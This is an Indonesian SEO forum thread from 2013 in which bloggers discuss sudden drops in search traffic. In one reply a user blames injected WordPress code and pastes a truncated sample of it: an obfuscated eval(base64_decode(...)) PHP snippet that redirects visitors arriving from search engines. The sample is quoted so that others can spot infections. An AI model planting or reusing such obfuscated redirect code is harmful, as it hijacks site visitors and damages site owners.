1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

Apakah hari ini ada yg visitornya turun / kena google dance?

Discussion in 'SEO' started by vianeri, Mar 29, 2013.

Tags:
  1. vianeri

    vianeri New Comer

    Joined:
    Dec 10, 2011
    Messages:
    47
    Likes Received:
    1
    Location:
    tempat tidur
    Selamat malam semua,

    Apakah hari ini tepatnya jam 2an siang tadi, ada yang mengalami visitor turun / mungkin kena google dance?

    soalnya saya ada 3 blog yang kena

    terimakasih

    View attachment 28398
     
  2. mascipul

    mascipul Super Hero

    Joined:
    Jul 8, 2010
    Messages:
    1,433
    Likes Received:
    62
    Location:
    jember kota JFC
    saya pernah mengalami hal yg sama, semua blog se hosting turun drastis visitornya. kirain kenak dance, ternyata nggak kayaknya.

    Usut punya usut, ternyata ada kode2 aneh nempel yg bikin visitor dari SE redirect ke situs lain, alhasil visitor berkurang drastis. Kemudian ane mintak tolong pihak support hosting, ternyata setelah di-scan, ada 8rb file lebih yg yg kenak inject kode2 alien tsb. Akhirnya, terpaksa install ulang WP 1per1.

    Karena gejalanya mirip, gak ada salahnya diintip2 dulu file2 WPnya. terutama di footer/header. kodenya semacam ini nih :

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw
     
  3. vianeri

    vianeri New Comer

    Joined:
    Dec 10, 2011
    Messages:
    47
    Likes Received:
    1
    Location:
    tempat tidur
    Ok terimakasih banyak atas sarannya, dicoba cek dulu..
     
  4. selamet

    selamet AdSense Pro

    Joined:
    Mar 26, 2010
    Messages:
    456
    Likes Received:
    22
    Cara scannya gimana ya bro? soalnya ada blog ane yg visitornya juga turun dengan gejala yang mirip

    -------------------------------------------------------------------------------------------------
    barusan cari plugin scanner, namanya Threat Scan Plugin
     
    Last edited: Mar 29, 2013
  5. cupu_belagu

    cupu_belagu Super Hero

    Joined:
    May 11, 2011
    Messages:
    1,920
    Likes Received:
    208
    Location:
    SALATIGA
    punya ane udah lama si, hampir 3 minggu belum sembuh
    ini blogcepot ane

    [​IMG]
     
  6. ilmansg

    ilmansg AdSense Starter

    Joined:
    Jun 22, 2012
    Messages:
    70
    Likes Received:
    3
    kalo baru hari ini doang, belum tentu google dance, hari libur perayaan begini memang rata2 traffic turun semua
     
  7. efyandro

    efyandro AdSense Fan

    Joined:
    Dec 1, 2011
    Messages:
    120
    Likes Received:
    4
    biasanya itu ulah pembuat tempaltenya.. atau yang tau seluk beluk template CMIIW
     
  8. mascipul

    mascipul Super Hero

    Joined:
    Jul 8, 2010
    Messages:
    1,433
    Likes Received:
    62
    Location:
    jember kota JFC
    sy mintak tolong ke pihak hosting mas. kebetulan sy ngehost di hawkhost, tinggal kirim aja tiket ke support dgn level critical. beberapa menit langsung direspon kok. ntar dikasi detilnya file2 mana aja yg kenak inject
     
  9. reza.suryadilaga

    reza.suryadilaga Sunda Wani

    Joined:
    May 13, 2012
    Messages:
    634
    Likes Received:
    56
    Location:
    Samudera Hindia
    resiko pake klo pake template nulled
    justru kemarin visitor saya naik :D
     
  10. 90317+0312

    90317+0312 Hero

    Joined:
    Sep 8, 2012
    Messages:
    604
    Likes Received:
    43
    ooo,,da jg kasus yg ky gt. cek dl brt.. thy
     
  11. sukino

    sukino Banned

    Joined:
    Oct 9, 2012
    Messages:
    938
    Likes Received:
    43
    Location:
    kamar sendiri
    :((:nangis: Punya ane juga gan turun gak naik naik, tau gimana ne.. minta pencerhanya dikit gan.. ada yang tau gak ya tool buat cak eror kode gituan.. ?
     
  12. Ahmadfahrizal

    Ahmadfahrizal Banned

    Joined:
    May 20, 2012
    Messages:
    68
    Likes Received:
    0
    Location:
    Banjarmasin
    hahaha punya saya juga sama turun gak naik2 sampai2 dari blogspot sekarang mirgarsi ke wp dan gak update artikel dulu sampai normal :tampar:
     
  13. wsarendy

    wsarendy New Comer

    Joined:
    Dec 7, 2012
    Messages:
    34
    Likes Received:
    2
    ow jadi bisa krn template ya..1 pelajaran baru..
     
  14. ajibs

    ajibs New Comer

    Joined:
    Sep 11, 2012
    Messages:
    26
    Likes Received:
    0
    google dance is homeymoon day :peace::peace:
     
  15. CuteGoblin

    CuteGoblin Super Hero

    Joined:
    Jun 30, 2009
    Messages:
    1,905
    Likes Received:
    123
    klo ampe anjlok gitu kemungkinan kena update algo simbah tu :demam:
     
  16. amir.amir003

    amir.amir003 AdSense Fan

    Joined:
    Apr 25, 2012
    Messages:
    141
    Likes Received:
    0
    sy punya blogspot trafficnya stabil, 100 uv/day
     
  17. blogger33

    blogger33 Super Hero

    Joined:
    Oct 12, 2012
    Messages:
    1,108
    Likes Received:
    53
    5 blog sya trafiknya pada turun..semakin diupdate semakin turun...hadeeeuh...
     
  18. Ahmadfahrizal

    Ahmadfahrizal Banned

    Joined:
    May 20, 2012
    Messages:
    68
    Likes Received:
    0
    Location:
    Banjarmasin
    sama gan blog saya juga ketika di update turun tapi ketika gak di update tidak turun
     

Share This Page